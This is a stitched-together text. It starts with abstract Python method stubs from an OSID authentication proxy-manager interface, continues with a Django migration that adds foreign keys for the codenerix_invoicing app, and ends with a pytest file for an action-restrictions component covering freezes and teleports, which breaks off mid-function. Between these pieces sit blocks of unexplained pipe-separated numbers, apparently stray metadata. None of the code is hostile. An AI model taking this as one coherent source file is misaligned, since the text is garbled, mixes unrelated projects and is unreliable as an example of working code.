    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agency_lookup()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agency_lookup()`` is ``true``.*

    """
    return  # osid.authentication.AgencyLookupSession
@abc.abstractmethod
def get_agency_search_session(self, proxy):
    """Gets the ``OsidSession`` associated with the agency search service.

    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgencySearchSession``
    :rtype: ``osid.authentication.AgencySearchSession``
    :raise: ``NullArgument`` -- ``proxy`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agency_search()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agency_search()`` is ``true``.*

    """
    return  # osid.authentication.AgencySearchSession
@abc.abstractmethod
def get_agency_admin_session(self, proxy):
    """Gets the ``OsidSession`` associated with the agency administration service.

    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgencyAdminSession``
    :rtype: ``osid.authentication.AgencyAdminSession``
    :raise: ``NullArgument`` -- ``proxy`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agency_admin()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agency_admin()`` is ``true``.*

    """
    return  # osid.authentication.AgencyAdminSession
@abc.abstractmethod
def get_agency_notification_session(self, agency_receiver, proxy):
    """Gets the messaging receiver session for notifications pertaining to agency changes.

    :param agency_receiver: the agency receiver
    :type agency_receiver: ``osid.authentication.AgencyReceiver``
    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgencyNotificationSession``
    :rtype: ``osid.authentication.AgencyNotificationSession``
    :raise: ``NullArgument`` -- ``agency_receiver`` or ``proxy`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agency_notification()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agency_notification()`` is ``true``.*

    """
    return  # osid.authentication.AgencyNotificationSession
@abc.abstractmethod
def get_agency_hierarchy_session(self, proxy):
    """Gets the session traversing agency hierarchies.

    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgencyHierarchySession``
    :rtype: ``osid.authentication.AgencyHierarchySession``
    :raise: ``NullArgument`` -- ``proxy`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agency_hierarchy()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agency_hierarchy()`` is ``true``.*

    """
    return  # osid.authentication.AgencyHierarchySession
@abc.abstractmethod
def get_agency_hierarchy_design_session(self, proxy):
    """Gets the session designing agency hierarchies.

    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgencyHierarchyDesignSession``
    :rtype: ``osid.authentication.AgencyHierarchyDesignSession``
    :raise: ``NullArgument`` -- ``proxy`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agency_hierarchy_design()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agency_hierarchy_design()`` is ``true``.*

    """
    return  # osid.authentication.AgencyHierarchyDesignSession
@abc.abstractmethod
def get_authentication_batch_proxy_manager(self):
    """Gets an ``AuthenticationBatchProxyManager``.

    :return: an ``AuthenticationBatchProxyManager``
    :rtype: ``osid.authentication.batch.AuthenticationBatchProxyManager``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_authentication_batch()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_authentication_batch()`` is ``true``.*

    """
    return  # osid.authentication.batch.AuthenticationBatchProxyManager

authentication_batch_proxy_manager = property(fget=get_authentication_batch_proxy_manager)
@abc.abstractmethod
def get_authentication_keys_proxy_manager(self):
    """Gets an ``AuthenticationKeysProxyManager``.

    :return: an ``AuthenticationKeysProxyManager``
    :rtype: ``osid.authentication.keys.AuthenticationKeysProxyManager``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_authentication_keys()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_authentication_keys()`` is ``true``.*

    """
    return  # osid.authentication.keys.AuthenticationKeysProxyManager

authentication_keys_proxy_manager = property(fget=get_authentication_keys_proxy_manager)
@abc.abstractmethod
def get_authentication_process_proxy_manager(self):
    """Gets an ``AuthenticationProcessProxyManager``.

    :return: an ``AuthenticationProcessProxyManager``
    :rtype: ``osid.authentication.process.AuthenticationProcessProxyManager``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_authentication_process()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_authentication_process()`` is ``true``.*

    """
    return  # osid.authentication.process.AuthenticationProcessProxyManager

authentication_process_proxy_manager = property(fget=get_authentication_process_proxy_manager)
| 38.76682
| 155
| 0.652356
| 5,068
| 50,707
| 6.379045
| 0.044396
| 0.052337
| 0.044542
| 0.035634
| 0.913483
| 0.884345
| 0.846485
| 0.805314
| 0.749049
| 0.709085
| 0
| 0
| 0.225965
| 50,707
| 1,307
| 156
| 38.79648
| 0.82369
| 0.712485
| 0
| 0.602459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.295082
| false
| 0
| 0.004098
| 0
| 0.704918
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
a9ceeb0d7e8e401304436cf9e199d1c7a430045b
| 14,617
|
py
|
Python
|
codenerix_invoicing/migrations/0002_auto_20180129_0937.py
|
centrologic/codenerix_invoicing
|
eb249c3a38d0e2e2fa9accf9a93f40418b906eda
|
[
"Apache-2.0"
] | null | null | null |
codenerix_invoicing/migrations/0002_auto_20180129_0937.py
|
centrologic/codenerix_invoicing
|
eb249c3a38d0e2e2fa9accf9a93f40418b906eda
|
[
"Apache-2.0"
] | null | null | null |
codenerix_invoicing/migrations/0002_auto_20180129_0937.py
|
centrologic/codenerix_invoicing
|
eb249c3a38d0e2e2fa9accf9a93f40418b906eda
|
[
"Apache-2.0"
] | 1
|
2018-05-22T10:00:23.000Z
|
2018-05-22T10:00:23.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-01-29 08:37
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated Django migration (Django 1.10.8, 2018-01-29).

    Second part of the initial schema: adds the relational fields
    (ForeignKey / ManyToMany) that link the sales, purchases, provider
    and customer models to the payments, products, POS and auth apps,
    plus a unique-together constraint on the sales basket.  Do not edit
    field definitions by hand — behavior must match the migration
    history already applied to databases.
    """

    # Part of the split initial migration, hence initial = True in 0002.
    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('codenerix_payments', '0001_initial'),
        ('codenerix_invoicing', '0001_initial'),
        ('codenerix_products', '0008_auto_20180126_1711'),
        ('codenerix_pos', '0001_initial'),
    ]

    operations = [
        # --- sales basket: POS links ---
        migrations.AddField(
            model_name='salesbasket',
            name='pos',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='basket_sales', to='codenerix_pos.POS', verbose_name='Point of Sales'),
        ),
        migrations.AddField(
            model_name='salesbasket',
            name='pos_slot',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='basket_sales', to='codenerix_pos.POSSlot', verbose_name='POS Slot'),
        ),
        # --- purchases: documents, tickets, orders, budgets, albarans ---
        migrations.AddField(
            model_name='purchasesticketrectificationdocument',
            name='ticket_rectification',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ticketrectificationdocument_purchases', to='codenerix_invoicing.PurchasesTicketRectification', verbose_name='Ticket rectification'),
        ),
        migrations.AddField(
            model_name='purchasesticketdocument',
            name='ticket',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ticketdocument_purchases', to='codenerix_invoicing.PurchasesTicket', verbose_name='Ticket'),
        ),
        migrations.AddField(
            model_name='purchasesticket',
            name='provider',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ticket_purchases', to='codenerix_invoicing.Provider', verbose_name='Provider'),
        ),
        migrations.AddField(
            model_name='purchasesorderdocument',
            name='order',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='orderdocument_purchases', to='codenerix_invoicing.PurchasesOrder', verbose_name='Purchases order'),
        ),
        migrations.AddField(
            model_name='purchasesorder',
            name='budget',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='order_purchases', to='codenerix_invoicing.PurchasesBudget', verbose_name='Budget'),
        ),
        migrations.AddField(
            model_name='purchasesorder',
            name='provider',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='order_purchases', to='codenerix_invoicing.Provider', verbose_name='Provider'),
        ),
        migrations.AddField(
            model_name='purchaseslineticketrectification',
            name='line_ticket',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_ticketrectification_purchases', to='codenerix_invoicing.PurchasesLineTicket', verbose_name='Line ticket'),
        ),
        migrations.AddField(
            model_name='purchaseslineticketrectification',
            name='product',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_ticketrectification_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
        ),
        migrations.AddField(
            model_name='purchaseslineticketrectification',
            name='ticket_rectification',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_ticketrectification_purchases', to='codenerix_invoicing.PurchasesTicketRectification', verbose_name='Ticket rectification'),
        ),
        migrations.AddField(
            model_name='purchaseslineticket',
            name='line_albaran',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_ticket_purchases', to='codenerix_invoicing.PurchasesLineAlbaran', verbose_name='Line albaran'),
        ),
        migrations.AddField(
            model_name='purchaseslineticket',
            name='product',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_ticket_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
        ),
        migrations.AddField(
            model_name='purchaseslineticket',
            name='ticket',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_ticket_purchases', to='codenerix_invoicing.PurchasesTicket', verbose_name='Ticket'),
        ),
        migrations.AddField(
            model_name='purchaseslineorder',
            name='line_budget',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_order_purchases', to='codenerix_invoicing.PurchasesLineBudget', verbose_name='Line budget'),
        ),
        migrations.AddField(
            model_name='purchaseslineorder',
            name='order',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_order_purchases', to='codenerix_invoicing.PurchasesOrder', verbose_name='Purchase order'),
        ),
        migrations.AddField(
            model_name='purchaseslineorder',
            name='product',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_order_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
        ),
        migrations.AddField(
            model_name='purchaseslineinvoicerectification',
            name='invoice_rectification',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_invoicerectification_purchases', to='codenerix_invoicing.PurchasesInvoiceRectification', verbose_name='Invoice rectification'),
        ),
        migrations.AddField(
            model_name='purchaseslineinvoicerectification',
            name='line_invoice',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_invoicerectification_purchases', to='codenerix_invoicing.PurchasesLineInvoice', verbose_name='Line invoice'),
        ),
        migrations.AddField(
            model_name='purchaseslineinvoicerectification',
            name='product',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_invoicerectification_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
        ),
        migrations.AddField(
            model_name='purchaseslineinvoice',
            name='invoice',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_invoice_purchases', to='codenerix_invoicing.PurchasesInvoice', verbose_name='Invoice'),
        ),
        migrations.AddField(
            model_name='purchaseslineinvoice',
            name='line_albaran',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_invoice_purchases', to='codenerix_invoicing.PurchasesLineAlbaran', verbose_name='Line albaran'),
        ),
        migrations.AddField(
            model_name='purchaseslineinvoice',
            name='product',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_invoice_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
        ),
        migrations.AddField(
            model_name='purchaseslinebudget',
            name='budget',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_budget_purchases', to='codenerix_invoicing.PurchasesBudget', verbose_name='Budget'),
        ),
        migrations.AddField(
            model_name='purchaseslinebudget',
            name='product',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_budget_purchases', to='codenerix_products.ProductFinal', verbose_name='Product'),
        ),
        migrations.AddField(
            model_name='purchaseslinealbaran',
            name='albaran',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_albaran_purchases', to='codenerix_invoicing.PurchasesAlbaran', verbose_name='Albaran'),
        ),
        migrations.AddField(
            model_name='purchaseslinealbaran',
            name='line_order',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='line_albaran_purchases', to='codenerix_invoicing.PurchasesLineOrder', verbose_name='Line orders'),
        ),
        migrations.AddField(
            model_name='purchaseslinealbaran',
            name='product_unique',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='line_albaran_purchases', to='codenerix_products.ProductUnique', verbose_name='Product'),
        ),
        migrations.AddField(
            model_name='purchaseslinealbaran',
            name='validator_user',
            field=models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='line_albaran_purchases', to=settings.AUTH_USER_MODEL, verbose_name='Validator user'),
        ),
        migrations.AddField(
            model_name='purchasesinvoicerectificationdocument',
            name='invoice_rectification',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoicerectificationdocument_purchases', to='codenerix_invoicing.PurchasesInvoiceRectification', verbose_name='Invoice rectification'),
        ),
        migrations.AddField(
            model_name='purchasesinvoicedocument',
            name='invoice',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoicedocument_purchases', to='codenerix_invoicing.PurchasesInvoice', verbose_name='Invoice'),
        ),
        migrations.AddField(
            model_name='purchasesinvoice',
            name='provider',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoice_purchases', to='codenerix_invoicing.Provider', verbose_name='Provider'),
        ),
        migrations.AddField(
            model_name='purchasesbudgetdocument',
            name='budget',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='budgetdocument_purchases', to='codenerix_invoicing.PurchasesBudget', verbose_name='Budget'),
        ),
        migrations.AddField(
            model_name='purchasesbudget',
            name='provider',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='budget_purchases', to='codenerix_invoicing.Provider', verbose_name='Provider'),
        ),
        migrations.AddField(
            model_name='purchasesalbarandocument',
            name='albaran',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='albarandocument_purchases', to='codenerix_invoicing.PurchasesAlbaran', verbose_name='Albaran'),
        ),
        migrations.AddField(
            model_name='purchasesalbaran',
            name='provider',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='albaran_purchases', to='codenerix_invoicing.Provider', verbose_name='Provider'),
        ),
        # --- provider: billing, categories, currency, taxes ---
        migrations.AddField(
            model_name='provider',
            name='billing_series',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='providers', to='codenerix_invoicing.BillingSeries', verbose_name='Billing series'),
        ),
        migrations.AddField(
            model_name='provider',
            name='categories',
            field=models.ManyToManyField(blank=True, related_name='providers', to='codenerix_products.Category'),
        ),
        migrations.AddField(
            model_name='provider',
            name='currency',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='providers', to='codenerix_payments.Currency', verbose_name='Currency'),
        ),
        migrations.AddField(
            model_name='provider',
            name='type_tax',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='providers', to='codenerix_products.TypeTax', verbose_name='Type tax'),
        ),
        # --- customer: documents, billing, currency, taxes ---
        migrations.AddField(
            model_name='customerdocument',
            name='customer',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='customer_documents', to='codenerix_invoicing.Customer', verbose_name='Customer'),
        ),
        migrations.AddField(
            model_name='customerdocument',
            name='type_document',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='customer_documents', to='codenerix_invoicing.TypeDocument', verbose_name='Type document'),
        ),
        migrations.AddField(
            model_name='customer',
            name='billing_series',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='codenerix_invoicing.BillingSeries', verbose_name='Billing series'),
        ),
        migrations.AddField(
            model_name='customer',
            name='currency',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='codenerix_payments.Currency', verbose_name='Currency'),
        ),
        migrations.AddField(
            model_name='customer',
            name='type_tax',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='codenerix_products.TypeTax', verbose_name='Type tax'),
        ),
        # --- constraints ---
        migrations.AlterUniqueTogether(
            name='salesbasket',
            unique_together=set([('code', 'parent_pk')]),
        ),
    ]
| 57.774704
| 230
| 0.685366
| 1,427
| 14,617
| 6.795375
| 0.094604
| 0.03795
| 0.064969
| 0.102093
| 0.85676
| 0.850366
| 0.751057
| 0.733629
| 0.733629
| 0.715582
| 0
| 0.003841
| 0.198536
| 14,617
| 252
| 231
| 58.003968
| 0.823901
| 0.004652
| 0
| 0.651639
| 1
| 0
| 0.29637
| 0.176406
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016393
| 0
| 0.032787
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a9d79e86852cfc2453d235e55ab96a44ad9aa118
| 19,659
|
py
|
Python
|
tests/ile_action_component_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 4
|
2021-02-04T03:57:52.000Z
|
2022-02-08T18:19:58.000Z
|
tests/ile_action_component_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 68
|
2021-05-06T08:52:46.000Z
|
2022-03-23T16:46:03.000Z
|
tests/ile_action_component_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 1
|
2021-02-04T03:21:57.000Z
|
2021-02-04T03:21:57.000Z
|
import pytest
from ideal_learning_env.actions_component import ActionRestrictionsComponent
from ideal_learning_env.defs import ILEConfigurationException, ILEException
def prior_scene(last_step: int = None):
    """Build a minimal ILE scene dict for tests.

    When a truthy ``last_step`` is given it is recorded under
    ``scene['goal']['last_step']``; otherwise the goal stays empty.
    """
    return {
        'debug': {},
        'goal': {'last_step': last_step} if last_step else {},
        'performerStart': {'position': {'x': 0, 'y': 0, 'z': 0}},
        'roomDimensions': {'x': 10, 'y': 3, 'z': 10},
    }
def test_action_restrictions_defaults():
    """With an empty config, no restrictions are set and no action_list appears."""
    component = ActionRestrictionsComponent({})
    assert component.passive_scene is None
    assert component.freezes is None
    assert component.teleports is None
    scene = component.update_ile_scene(prior_scene())
    goal = scene['goal']
    assert isinstance(goal, dict)
    # Bug fix: goal is a dict, so hasattr(goal, 'action_list') was always
    # False and the old assertion was vacuous; check key membership instead.
    assert 'action_list' not in goal
def test_action_restrictions_passive():
    """A passive scene forces a single 'Pass' action at every step."""
    total_steps = 100
    component = ActionRestrictionsComponent({'passive_scene': True})
    assert isinstance(component.passive_scene, bool)
    assert component.passive_scene
    result = component.update_ile_scene(prior_scene(total_steps))
    goal = result['goal']
    assert isinstance(goal, dict)
    action_list = goal['action_list']
    assert isinstance(action_list, list)
    assert len(action_list) == total_steps
    for step_actions in action_list:
        assert isinstance(step_actions, list)
        assert step_actions == ['Pass']
def test_action_restrictions_freeze_start():
    """A freeze with only a begin step 'Pass'es from there through last_step."""
    begin = 2
    component = ActionRestrictionsComponent({'freezes': [{'begin': begin}]})
    freezes = component.get_freezes()
    assert isinstance(freezes, list)
    assert freezes[0].begin == begin
    assert freezes[0].end is None
    result = component.update_ile_scene(prior_scene(100))
    goal = result['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    assert len(actions) == 100
    # Steps are ordinal (1-based) while the list index is 0-based.
    for step, per_step in enumerate(actions, start=1):
        assert isinstance(per_step, list)
        assert per_step == (['Pass'] if step >= begin else [])
def test_action_restrictions_freeze_start_end():
    """A freeze with begin and end 'Pass'es only within [begin, end)."""
    begin, end = 4, 8
    component = ActionRestrictionsComponent({
        'freezes': [{'begin': begin, 'end': end}]
    })
    freezes = component.get_freezes()
    assert isinstance(freezes, list)
    assert freezes[0].begin == begin
    assert freezes[0].end == end
    result = component.update_ile_scene(prior_scene())
    goal = result['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    assert len(actions) == end - 1
    for idx, per_step in enumerate(actions):
        assert isinstance(per_step, list)
        # begin/end are 1-based; end is exclusive.
        assert per_step == (['Pass'] if begin - 1 <= idx < end - 1 else [])
def test_action_restrictions_freeze_choice():
    """When freezes holds a list of options, exactly one is chosen consistently."""
    options = [(1, 2), (3, 4), (5, 6)]
    begins = [pair[0] for pair in options]
    component = ActionRestrictionsComponent({
        'freezes': [[{'begin': b, 'end': e} for b, e in options]]
    })
    freezes = component.get_freezes()
    assert isinstance(freezes, list)
    # Recover which option was randomly picked and verify self-consistency.
    begin, end = options[begins.index(freezes[0].begin)]
    assert freezes[0].begin == begin
    assert freezes[0].end == end
    result = component.update_ile_scene(prior_scene())
    goal = result['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    # The action list length equals the chosen begin step (end - 1 == begin).
    begin, end = options[begins.index(len(actions))]
    assert len(actions) == begin
    for idx, per_step in enumerate(actions):
        assert isinstance(per_step, list)
        assert per_step == (['Pass'] if begin - 1 <= idx < end - 1 else [])
def test_action_restrictions_freeze_ok_overlap():
    """Two freezes that merely touch (first end == second begin) are legal."""
    first = (4, 6)
    second = (6, 8)
    component = ActionRestrictionsComponent({
        'freezes': [
            {'begin': first[0], 'end': first[1]},
            {'begin': second[0], 'end': second[1]},
        ]
    })
    freezes = component.get_freezes()
    assert isinstance(freezes, list)
    assert (freezes[0].begin, freezes[0].end) == first
    assert (freezes[1].begin, freezes[1].end) == second
    result = component.update_ile_scene(prior_scene())
    goal = result['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    assert len(actions) == second[1] - 1
    for idx, per_step in enumerate(actions):
        assert isinstance(per_step, list)
        # Contiguous windows: frozen from first begin through second end.
        assert per_step == (
            ['Pass'] if first[0] - 1 <= idx < second[1] - 1 else []
        )
def test_action_restrictions_freeze_gap():
    """Two disjoint freezes leave the steps between them unrestricted."""
    first = (2, 4)
    second = (8, 12)
    component = ActionRestrictionsComponent({
        'freezes': [
            {'begin': first[0], 'end': first[1]},
            {'begin': second[0], 'end': second[1]},
        ]
    })
    freezes = component.get_freezes()
    assert isinstance(freezes, list)
    assert (freezes[0].begin, freezes[0].end) == first
    assert (freezes[1].begin, freezes[1].end) == second
    result = component.update_ile_scene(prior_scene())
    goal = result['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    assert len(actions) == second[1] - 1

    def is_frozen(index):
        # True when the 0-based index is inside either 1-based freeze window.
        return (first[0] - 1 <= index < first[1] - 1
                or second[0] - 1 <= index < second[1] - 1)

    for idx, per_step in enumerate(actions):
        assert isinstance(per_step, list)
        assert per_step == (['Pass'] if is_frozen(idx) else [])
def test_action_restrictions_freeze_bad_overlap():
    """Freezes that truly overlap (not just touch) raise ILEException."""
    component = ActionRestrictionsComponent({
        'freezes': [
            {'begin': 2, 'end': 7},
            {'begin': 5, 'end': 10},
        ]
    })
    freezes = component.get_freezes()
    assert isinstance(freezes, list)
    assert freezes[0].begin == 2
    assert freezes[0].end == 7
    assert freezes[1].begin == 5
    assert freezes[1].end == 10
    with pytest.raises(ILEException):
        component.update_ile_scene(prior_scene())
def test_action_restrictions_freeze_just_end():
    """A freeze with only an end 'Pass'es from step 1 up to (exclusive) end."""
    end = 3
    component = ActionRestrictionsComponent({'freezes': [{'end': end}]})
    freezes = component.get_freezes()
    assert isinstance(freezes, list)
    assert freezes[0].begin is None
    assert freezes[0].end == end
    result = component.update_ile_scene(prior_scene())
    goal = result['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    assert len(actions) == end - 1
    for idx, per_step in enumerate(actions):
        assert isinstance(per_step, list)
        # end - 2: one off for 1-based steps, one because end is exclusive.
        assert per_step == (['Pass'] if idx <= end - 2 else [])
def test_action_restrictions_freeze_missing_start_and_end():
    """A freeze with neither begin nor end is a configuration error."""
    component = ActionRestrictionsComponent({'freezes': [{}]})
    freezes = component.get_freezes()
    assert isinstance(freezes, list)
    assert freezes[0].begin is None
    assert freezes[0].end is None
    with pytest.raises(ILEConfigurationException):
        component.update_ile_scene(prior_scene())
def test_action_restrictions_freeze_empty_list():
    """An empty freezes list must not add an action_list to the goal."""
    component = ActionRestrictionsComponent({'freezes': []})
    fzs = component.get_freezes()
    assert isinstance(fzs, list)
    scene = component.update_ile_scene(prior_scene())
    goal = scene['goal']
    assert isinstance(goal, dict)
    # Bug fix: goal is a dict, so hasattr(goal, 'action_list') was always
    # False and the old assertion was vacuous; check key membership instead.
    assert 'action_list' not in goal
def test_action_restriction_teleport_missing_step():
    """A teleport without a 'step' is rejected at component construction."""
    config = {
        'teleports': [{
            'position_x': 1,
            'position_z': 2,
            'rotation_y': 30
        }]
    }
    with pytest.raises(ILEException):
        ActionRestrictionsComponent(config)
def test_action_restriction_teleport_missing_pos_x():
    """A teleport with position_z but no position_x fails at update time."""
    step = 8
    component = ActionRestrictionsComponent({
        'teleports': [{'step': step, 'position_z': 2, 'rotation_y': 30}]
    })
    teleports = component.get_teleports()
    assert isinstance(teleports, list)
    first = teleports[0]
    assert first.step == step
    assert first.position_x is None
    assert first.position_z == 2
    assert first.rotation_y == 30
    # A half-specified position cannot be encoded into a teleport action.
    with pytest.raises(ILEConfigurationException):
        component.update_ile_scene(prior_scene())
def test_action_restriction_teleport_missing_pos_z():
    """A teleport with position_x but no position_z fails at update time."""
    step = 8
    component = ActionRestrictionsComponent({
        'teleports': [{'step': step, 'position_x': 2, 'rotation_y': 30}]
    })
    teleports = component.get_teleports()
    assert isinstance(teleports, list)
    first = teleports[0]
    assert first.step == step
    assert first.position_z is None
    assert first.position_x == 2
    assert first.rotation_y == 30
    # A half-specified position cannot be encoded into a teleport action.
    with pytest.raises(ILEConfigurationException):
        component.update_ile_scene(prior_scene())
def test_action_restriction_teleport_missing_rot_y():
    """A teleport may omit rotation_y; only the position is then encoded."""
    step = 8
    component = ActionRestrictionsComponent({
        'teleports': [{'step': step, 'position_x': 2, 'position_z': 3}]
    })
    teleports = component.get_teleports()
    assert isinstance(teleports, list)
    first = teleports[0]
    assert first.step == step
    assert first.position_z == 3
    assert first.position_x == 2
    assert first.rotation_y is None
    scene = component.update_ile_scene(prior_scene())
    goal = scene['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    assert len(actions) == step
    expected = "EndHabituation,xPosition=2,zPosition=3"
    for idx, step_actions in enumerate(actions):
        assert isinstance(step_actions, list)
        # Steps are 1-based, so the teleport lands at index step - 1.
        if idx == step - 1:
            assert step_actions == [expected]
        else:
            assert step_actions == []
def test_action_restriction_teleport():
    """A fully specified teleport becomes one EndHabituation action."""
    step = 3
    component = ActionRestrictionsComponent({
        'teleports': [{
            'step': step,
            'position_x': 1,
            'position_z': 2,
            'rotation_y': 45
        }]
    })
    teleports = component.get_teleports()
    assert isinstance(teleports, list)
    assert teleports[0].step == step
    assert teleports[0].position_x == 1
    assert teleports[0].position_z == 2
    assert teleports[0].rotation_y == 45
    scene = component.update_ile_scene(prior_scene())
    goal = scene['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    assert len(actions) == step
    expected = 'EndHabituation,xPosition=1,zPosition=2,yRotation=45'  # noqa: E501
    for idx, step_actions in enumerate(actions):
        assert isinstance(step_actions, list)
        # Steps are 1-based, so the teleport lands at index step - 1.
        if idx == step - 1:
            assert step_actions == [expected]
        else:
            assert step_actions == []
def test_action_restriction_teleport_choice():
